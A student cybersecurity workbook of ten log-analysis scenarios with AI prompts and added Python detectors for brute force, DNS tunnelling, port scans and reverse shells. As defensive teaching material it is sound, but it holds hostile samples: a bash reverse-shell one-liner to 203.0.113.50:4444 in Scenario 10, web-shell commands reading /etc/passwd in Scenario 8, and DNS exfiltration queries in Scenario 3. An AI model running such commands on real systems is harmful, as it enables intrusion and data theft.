Student Workbook: 10 Cybersecurity Practice Scenarios
Welcome to the hands-on lab sheet! For each scenario, analyze the log snippet or image provided and attempt to answer the questions on your own, or feed the details into an AI assistant (such as Claude, Gemini, or ChatGPT) using the suggested prompts.
🛡️ Scenario 1: The Midnight Intruder (SSH Brute Force)
Tools involved: Linux Auth Logs / Wazuh
Task: Figure out what type of network activity occurred on the Linux server and whether the attacker succeeded.

Jun 24 02:11:01 server1 sshd[1245]: Failed password for invalid user admin from 192.168.1.182 port 49281 ssh2
Jun 24 02:11:03 server1 sshd[1247]: Failed password for invalid user admin from 192.168.1.182 port 49286 ssh2
Jun 24 02:11:05 server1 sshd[1251]: Failed password for root from 192.168.1.182 port 49290 ssh2
Jun 24 02:11:08 server1 sshd[1255]: Accepted password for root from 192.168.1.182 port 49298 ssh2
[!TIP] Prompt for AI:
"Explain these auth logs. What type of attack is happening? Did the attack succeed, and if so, at what timestamp and user account?"
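A detection rule for this scenario, written as an added example (not part of the workbook): it correlates failed and accepted sshd logins per source IP, so the alert says not only that a brute force happened but that it succeeded, against which account and when. The sample lines are the four from Scenario 1; the year 2026 and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the four auth.log lines from Scenario 1.
AUTH_LOG = """\
Jun 24 02:11:01 server1 sshd[1245]: Failed password for invalid user admin from 192.168.1.182 port 49281 ssh2
Jun 24 02:11:03 server1 sshd[1247]: Failed password for invalid user admin from 192.168.1.182 port 49286 ssh2
Jun 24 02:11:05 server1 sshd[1251]: Failed password for root from 192.168.1.182 port 49290 ssh2
Jun 24 02:11:08 server1 sshd[1255]: Accepted password for root from 192.168.1.182 port 49298 ssh2
"""

# sshd logs "for invalid user <name>" when the account does not exist and
# "for <name>" when it does; the optional group absorbs that difference.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def detect_bruteforce(log: str, threshold: int = 3, window_s: int = 300) -> list:
    """One finding per source IP that reaches `threshold` failed logins. If an
    accepted login from that IP follows within `window_s`, the finding also
    records which account was taken and when: that is the incident, not just noise."""
    failures = defaultdict(list)   # ip -> [datetime of each failure]
    findings = {}                  # ip -> finding; a dict keeps one per source
    for line in log.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ip = m["ip"]
        # Syslog timestamps carry no year; assume one so time deltas can be computed.
        when = datetime.strptime("2026 " + m["ts"], "%Y %b %d %H:%M:%S")
        if m["result"] == "Failed":
            failures[ip].append(when)
            if len(failures[ip]) >= threshold:
                findings.setdefault(ip, {"ip": ip, "user": None, "success_at": None})
                findings[ip]["failures"] = len(failures[ip])
            continue
        # Accepted login: correlate it with recent failures from the same source.
        recent = [t for t in failures[ip] if (when - t).total_seconds() <= window_s]
        if len(recent) >= threshold:
            findings[ip].update(user=m["user"], success_at=m["ts"])
    return list(findings.values())

if __name__ == "__main__":
    for f in detect_bruteforce(AUTH_LOG):
        print("ALERT", f)
```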
🛡️ Scenario 2: The Shadow Modification (File Integrity Monitoring)
Tools involved: Wazuh FIM
Task: An alert has popped up on your SIEM. Identify which critical operating system file was modified.

{"syscheck":{"path":"/etc/shadow","event":"modified","size_after":1204,"md5_after":"9d8b7a6c5e4d3c2b1a0f9e8d7c6b5a4","uname_after":"root","gname_after":"shadow"}}
[!TIP] Prompt for AI:
"I received a Wazuh syscheck alert for the file path '/etc/shadow'. Explain what this file is on Linux, what the 'modified' event means, and why this represents a major security risk."
🔍 Scenario 3: The Secret Channel (DNS Tunneling)
Tools involved: Wireshark / Network Logs
Task: Analyze the network capture queries. Does this traffic look like normal internet browsing?

Query 1: 7a6664673839326b6a6866647361.exfil.maliciousdomain.com - Type: TXT
Query 2: 6b6a6b6a6e627663787a6c6b6a68.exfil.maliciousdomain.com - Type: TXT
Query 3: 71776572747975696f7061736466.exfil.maliciousdomain.com - Type: TXT
[!TIP] Prompt for AI:
"I am reviewing Wireshark captures of DNS queries and see multiple requests formatted with long, random alphanumeric characters querying TXT records on a subdomain 'exfil.maliciousdomain.com'. Is this normal? What security technique could this represent?"
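Added example (not from the workbook): the heuristics an analyst would script to pick out the Scenario 3 queries from ordinary DNS traffic, including decoding the hex-encoded leftmost labels to show what the tunnel is carrying and identifying the parent domain to block. The two benign lookups, the label-length and entropy thresholds are assumptions.

```python
import binascii
import math
from collections import Counter

# Constructed sample: the three Scenario 3 TXT queries plus two ordinary lookups.
QUERIES = [
    ("7a6664673839326b6a6866647361.exfil.maliciousdomain.com", "TXT"),
    ("6b6a6b6a6e627663787a6c6b6a68.exfil.maliciousdomain.com", "TXT"),
    ("71776572747975696f7061736466.exfil.maliciousdomain.com", "TXT"),
    ("www.example.com", "A"),
    ("mail.example.com", "MX"),
]

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payloads score well above dictionary-word labels."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def try_hex_decode(label: str):
    """Decoded text if the label is even-length hex that decodes to printable ASCII, else None."""
    if len(label) % 2 or not all(ch in "0123456789abcdefABCDEF" for ch in label):
        return None
    try:
        text = binascii.unhexlify(label).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def score_query(name: str, qtype: str, long_label: int = 20) -> dict:
    """Flag a query when at least three tunnelling markers coincide."""
    first = name.split(".")[0]
    reasons = []
    if len(first) >= long_label:
        reasons.append(f"long leftmost label ({len(first)} chars)")
    if shannon_entropy(first) > 2.5:
        reasons.append(f"high entropy ({shannon_entropy(first):.2f} bits/char)")
    if qtype in ("TXT", "NULL"):
        reasons.append(f"{qtype} records carry free-form data")
    decoded = try_hex_decode(first)
    if decoded is not None:
        reasons.append(f"label hex-decodes to {decoded!r}")
    return {"name": name, "suspicious": len(reasons) >= 3,
            "decoded": decoded, "reasons": reasons}

def tunnelled_domains(queries, min_hits: int = 3) -> set:
    """Parent domains with at least `min_hits` suspicious queries: block the parent, not the labels."""
    parents = Counter(q.split(".", 1)[1] for q, t in queries
                      if score_query(q, t)["suspicious"])
    return {d for d, n in parents.items() if n >= min_hits}
```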
🔍 Scenario 4: Whispering in the Dark (HTTP Cleartext Leak)
Tools involved: Wireshark HTTP Capture
Task: Identify the information exposed over the network because the website didn't use encryption.

POST /login.php HTTP/1.1
Host: insecure-portal.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

username=super_admin&password=Password123%21
[!TIP] Prompt for AI:
"Here is an HTTP packet payload captured in Wireshark. Explain what protocol is in use, what data was sent, why this is unsafe, and how the network administrator should fix this vulnerability."
🛡️ Scenario 5: Knocking on Every Door (Port Scan)
Tools involved: Wazuh / Firewall Logs
Task: Figure out what the external device is trying to do by scanning different ports.

2026-06-24 04:30:01 BLOCK 192.168.10.45:51230 -> 10.0.5.12:21 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51231 -> 10.0.5.12:22 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51232 -> 10.0.5.12:23 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51233 -> 10.0.5.12:80 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51234 -> 10.0.5.12:443 TCP SYN
[!TIP] Prompt for AI:
"Explain this firewall log. Why is one IP address sending SYN packets to consecutive destination ports in a matter of seconds, and what is the attacker attempting to find out?"
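Added example (not from the workbook): a sliding-window port-scan detector run over the Scenario 5 firewall lines. It groups SYNs by (source, destination) and alerts when one pair touches enough distinct ports inside a short window; the extra ALLOW line from 10.0.5.20, the five-port threshold and the ten-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: the five firewall lines from Scenario 5 plus one benign
# connection from another host, so the detector has something not to flag.
FW_LOG = """\
2026-06-24 04:30:01 BLOCK 192.168.10.45:51230 -> 10.0.5.12:21 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51231 -> 10.0.5.12:22 TCP SYN
2026-06-24 04:30:02 BLOCK 192.168.10.45:51232 -> 10.0.5.12:23 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51233 -> 10.0.5.12:80 TCP SYN
2026-06-24 04:30:03 BLOCK 192.168.10.45:51234 -> 10.0.5.12:443 TCP SYN
2026-06-24 04:30:05 ALLOW 10.0.5.20:40010 -> 10.0.5.12:443 TCP SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<action>\w+) "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+) TCP SYN$"
)

def detect_port_scans(log: str, min_ports: int = 5, window: timedelta = timedelta(seconds=10)) -> list:
    """Report (src, dst) pairs that probe at least `min_ports` distinct destination
    ports inside one sliding `window`. BLOCK and ALLOW lines both count: a scanner
    learns something from either outcome, and a BLOCK only means that one probe
    was stopped, not that the reconnaissance was."""
    events = defaultdict(list)   # (src, dst) -> [(time, dport), ...]
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events[(m["src"], m["dst"])].append((ts, int(m["dport"])))
    findings = []
    for (src, dst), hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            # Distinct ports touched in [start, start + window]; stop at the first hit.
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) >= min_ports:
                findings.append({"src": src, "dst": dst, "ports": sorted(ports),
                                 "first_seen": start.strftime("%H:%M:%S")})
                break
    return findings

if __name__ == "__main__":
    for f in detect_port_scans(FW_LOG):
        print(f"ALERT port scan {f['src']} -> {f['dst']} at {f['first_seen']}: ports {f['ports']}")
```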
🛡️ Scenario 6: The Infected Executable (VirusTotal Match)
Tools involved: Wazuh SIEM & VirusTotal Integration
Task: Assess the threat level of the downloaded script.

{"virustotal":{"found":1,"malicious":12,"positives":12,"scan_date":"2026-06-24","permalink":"https://virustotal.com"},"file":"/tmp/suspicious_script.sh"}
[!TIP] Prompt for AI:
"My Wazuh agent detected a file at '/tmp/suspicious_script.sh' and triggered a VirusTotal integration match showing 12 positive detections. What does this mean? Should I delete it, and how should I investigate further?"
🔍 Scenario 7: The Duplicate Identity (ARP Spoofing)
Tools involved: Wireshark Expert Info
Task: Find out why Wireshark is warning you that two MAC addresses are claiming the same IP address.

Warning: Duplicate IP address configured for 192.168.1.1 (00:0c:29:4f:8e:12) - also claimed by 00:0c:29:ab:cd:ef
[!TIP] Prompt for AI:
"Wireshark shows an Expert Info warning: 'Duplicate IP address configured'. Both MAC addresses 00:0c:29:4f:8e:12 and 00:0c:29:ab:cd:ef are claiming to be the gateway IP 192.168.1.1. What network attack is this?"
🛡️ Scenario 8: The Backdoor Command (Web Shell Execution)
Tools involved: Web Server Access Logs
Task: Spot the suspicious HTTP request in the Apache access logs.

192.168.5.10 - - [24/Jun/2026:05:00:23 +0000] "GET /index.php HTTP/1.1" 200 4502
192.168.5.10 - - [24/Jun/2026:05:01:45 +0000] "POST /uploads/cmd.php?cmd=whoami HTTP/1.1" 200 15
192.168.5.10 - - [24/Jun/2026:05:02:10 +0000] "POST /uploads/cmd.php?cmd=cat+/etc/passwd HTTP/1.1" 200 2405
[!TIP] Prompt for AI:
"Look at these web server logs. Explain the difference between the first request and the last two. What is 'cmd.php?cmd=whoami' trying to achieve?"
🔍 Scenario 9: The Imposter Gateway (Rogue DHCP Server)
Tools involved: Wireshark DHCP Packets
Task: Check if the network's DHCP settings have been hijacked by a rogue server.

DHCP Offer Packet Info:
Server Identifier (DHCP IP): 192.168.1.250
Router (Gateway IP Offered): 192.168.1.250 (Expected gateway is 192.168.1.1)
[!TIP] Prompt for AI:
"During a Wireshark capture of DHCP traffic, I see a DHCP Offer where the server IP and the suggested default router are 192.168.1.250, but my legitimate router is 192.168.1.1. Explain rogue DHCP servers and what threat this poses."
🛡️ Scenario 10: The Rogue Spawn (Suspicious Child Process)
Tools involved: Wazuh / OS Sysmon Logs
Task: Determine if the web server has been compromised based on the process parent-child relationship.

{
"event": "Process Creation",
"parent_process": "/usr/sbin/nginx",
"child_process": "/bin/bash",
"command_line": "/bin/bash -i >& /dev/tcp/203.0.113.50/4444 0>&1"
}
[!TIP] Prompt for AI:
"Explain this Process Creation log. A web server process (nginx) has spawned a shell (/bin/bash) with command arguments '/bin/bash -i >& /dev/tcp/203.0.113.50/4444 0>&1'. What is this command doing?"
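Added example (not from the workbook): a process-lineage rule that rates the Scenario 10 event and extracts the remote endpoint from the `/dev/tcp/<host>/<port>` redirection, which is the indicator to search for on other hosts. The two benign events, the lists of web-server and shell binaries, and the severity levels are assumptions.

```python
import re

# Constructed sample: the Scenario 10 event plus two benign process creations,
# so the rule has to discriminate rather than fire on every shell launch.
EVENTS = [
    {"event": "Process Creation", "parent_process": "/usr/sbin/nginx",
     "child_process": "/bin/bash",
     "command_line": "/bin/bash -i >& /dev/tcp/203.0.113.50/4444 0>&1"},
    {"event": "Process Creation", "parent_process": "/usr/sbin/cron",
     "child_process": "/bin/bash",
     "command_line": "/bin/bash /usr/local/bin/rotate-logs.sh"},
    {"event": "Process Creation", "parent_process": "/usr/sbin/nginx",
     "child_process": "/usr/sbin/nginx", "command_line": "nginx: worker process"},
]

# Parents that should not spawn an interactive shell during normal operation.
WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# bash opens a TCP/UDP socket when a redirection names /dev/tcp/<host>/<port>.
DEV_TCP_RE = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d+)")

def classify(event: dict) -> dict:
    """Rate one process-creation event and pull out the remote endpoint, if any,
    so the analyst has the indicator to search for across other hosts."""
    parent = event["parent_process"].rsplit("/", 1)[-1]
    child = event["child_process"].rsplit("/", 1)[-1]
    cmd = event.get("command_line", "")
    indicators, remote = [], None
    if parent in WEB_SERVERS and child in SHELLS:
        indicators.append(f"{parent} spawned {child}")
    if child in SHELLS and re.search(r"\s-i(\s|$)", cmd):
        indicators.append("interactive shell flag")
    sock = DEV_TCP_RE.search(cmd)
    if sock:
        remote = f"{sock['host']}:{sock['port']}"
        indicators.append(f"{sock['proto']} socket to {remote} via {sock.group(0)}")
    if sock and ">&" in cmd and "0>&1" in cmd:
        indicators.append("stdin/stdout/stderr wired to the socket")
    if sock:
        severity = "critical"   # outbound socket from a shell: reverse shell
    elif indicators:
        severity = "high"       # unexpected lineage, no network use seen yet
    else:
        severity = "none"
    return {"severity": severity, "remote": remote, "indicators": indicators}

if __name__ == "__main__":
    for e in EVENTS:
        print(classify(e))
```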